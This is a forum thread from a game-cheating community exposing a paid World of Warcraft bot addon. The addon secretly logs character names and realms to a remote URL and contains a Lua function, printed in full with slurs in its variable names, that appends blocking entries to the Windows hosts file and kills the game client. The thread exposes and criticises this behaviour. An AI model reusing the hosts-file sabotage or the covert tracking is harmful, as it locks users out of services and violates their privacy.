-
Active Member
XenRotations Logging Character Information
With XenRotations being one of the more popular paid addons, felt it was only right to share this with the public.
All users of this addon should be aware that it is logging your character name and server at the following web address:
http://xenrotations.com/wp-content/wow/wow/alo.php?charname=CHARACTER_NAME&charrealm=CHARACTER_REALM&username=XXXX
The addon also contains a function to add the following lines to your HOSTS file, although it's unclear at this time if it's called anywhere.
127.0.0.1 ip-184-168-42-232.ip.secureserver.net
127.0.0.1 worldofwarcraft.com
127.0.0.1 us.logon.worldofwarcraft.com
127.0.0.1 eu.logon.worldofwarcraft.com
127.0.0.1 logon.worldofwarcraft.com
127.0.0.1 us.battle.net
127.0.0.1 eu.battle.net
Last edited by outlawfosho; 12-13-2016 at 05:50 PM.
-
Post Thanks / Like - 3 Thanks
-
Do you have a copy of their software? I'd love to poke at it.
-
Post Thanks / Like - 1 Thanks
shahinpb (1 members gave Thanks to ev0 for this useful post)
-
Active Member
Originally Posted by
SniffingPickles
Do you have a copy of their software? I'd love to poke at it.
Here you go, TinyUpload.com - best file hosting solution, with no limits, totaly free
VirusTotal: 1/55 Antivirus scan for ef46bff38aa1ad508188aed89244f83242af61b4b657aec06f86950da1f0eb41 at
2016-12-14 03:02:43 UTC - VirusTotal
While that 1/55 is probably a false positive, I have not poked around the loader at all so please take proper precautions when running anything. As far as the DLL, at first glance it checks for Firehack.dll and if found it loads the addon by calling one of FH's exported functions.
-
Post Thanks / Like - 3 Thanks
-
Active Member
Also should add that I have the actual addon source, dumped it to further investigate when I saw that character information was being logged. Can provide it to any reputable member to confirm, just hit me up.
-
Code:
function _isPlayerGay()
local gay = WriteFile
local notgay = ReadFile
local gayness = notgay("C:\\Windows\\System32\\drivers\\etc\\hоsts");
local doitinthebutt = gayness .. "\n" .. "\n" .. "127.0.0.1 ip-184-168-42-232.ip.secureserver.net" .. "\n" .. "127.0.0.1 worldofwarcraft.com" .. "\n" .. "127.0.0.1 us.logon.worldofwarcraft.com" .. "\n" .. "127.0.0.1 eu.logon.worldofwarcraft.com" .. "\n" .. "127.0.0.1 logon.worldofwarcraft.com" .. "\n" .. "127.0.0.1 us.battle.net" .. "\n" .. "127.0.0.1 eu.battle.net";
gay("C:\\Windows\\System32\\drivers\\etc\\hоsts",doitinthebutt);
C_Timer.After(3,function() TerminateClient() end);
if imsupergay then return true; end
end
Disgusting.
-
It appears to be not in use currently, but
Code:
function ReadFile (Path)
function WriteFile (Path, Contents[, Append])
are actual existing functions supplied by FireHack.
I guess what stopped them is that Windows requires admin rights to write the hosts file.
Considering the binary is linked with debugging information from someone using the inbuild Administrator user account for some stupid reason, they actually thought this would work.
(C:\Users\Administrator\Documents\!Everything\dll\trunk\x64\Release\xenRotations .pdb)
Last edited by maclone; 12-15-2016 at 04:15 AM.
-
Post Thanks / Like - 4 Thanks
-
Active Member
Original work seems to be dying out completely, it's really quite sad. The core of the addon is 99% similar to what at least 3 other people I've personally witnessed are selling as their own product. This particular one has an added drawing library that someone else coded (lol) and "updated" rotations but I'm curious as to who the original author is. Seems like there are only a few real developers left in the scene and the rest is just a giant pool of copy & paste money grabs.
To the real developers out there who may read this, your work is very much appreciated.
Last edited by outlawfosho; 12-15-2016 at 03:45 PM.
-
Post Thanks / Like - 1 Thanks
ev0 (1 members gave Thanks to outlawfosho for this useful post)
-
Anything with a 1 time payment should be a red flag.
-
Member
This has been a project me and a few friends have been working on for a couple years. We must have been messing around with readfile / writefile functions at some point seeing if it could write to hosts. I don't call that function anywhere, though I did add logs of charname / realm, I don't / haven't used them for anything. Perhaps I was trying to see the results (rating increase) of people using my routines? No malicious intent, though I've messed around with FireHack's api seeing what is possible. Is that not normal? Am I a special snowflake? ;( p.s, Thanks for not publicly dumping the source op. Appreciate it. Anyone that knows what they're doing feel free to take a good thorough look.
Last edited by ArenaFarm; 12-20-2016 at 03:46 PM.
-
Originally Posted by
Xentrocity
This has been a project me and a few friends have been working on for a couple years. We must have been messing around with readfile / writefile functions at some point seeing if it could write to hosts. I don't call that function anywhere, though I did add logs of charname / realm, I don't / haven't used them for anything. Perhaps I was trying to see the results (rating increase) of people using my routines? No malicious intent, though I've messed around with FireHack's api seeing what is possible. Is that not normal? Am I a special snowflake? ;( p.s, Thanks for not publicly dumping the source op. Appreciate it. Anyone that knows what they're doing feel free to take a good thorough look.
You logged your user's data, regardless if there was no malicious intent, you shouldn't do this. People trusted you with their money and personal information. What if someone got into your database, saw your logged characters and released it? Mayhem would ensue of people "cheating" the game (it's a double edged sword, i don't support people botting pvp,but i also support their ability to do so). Not to mention you had a function, that if executed, would cause the player to not be able to play wow unless extensive research and review of host files was done (yes, i understand writing to host files requires admin rights, nevertheless tisk tisk).
You had dirty code in your software to which you charged people an arm and a leg for. I don't support you or your the shady practices used in your software..
-
Post Thanks / Like - 5 Thanks
-
Member
yeah, I was about to purchase from Xen and now I am glad I didn't... Thanks Snowflake.
-
Member
epic nice from xen to log it's users
-
Banned
is not very nice to log users.
-
Post Thanks / Like - 2 Thanks
ilexpit,
ilexgs (2 members gave Thanks to ThornStorm for this useful post)
-
Member
The fact that even a moderator here found the code and does not matter it is active or not active to me is almost a banable offense.
Xen, even if you did not put that code in I'd be stripping that out ASAP and doing a public apology if you want to save face at all since this has been linked to nearly all major discord at some point of time in passing conversation.
-
Banned
i resell 2 xen accounts less than 10$ if anybody interested
-
Banned
You can always just use the free version on SVN, its spyware free.
Xen SVN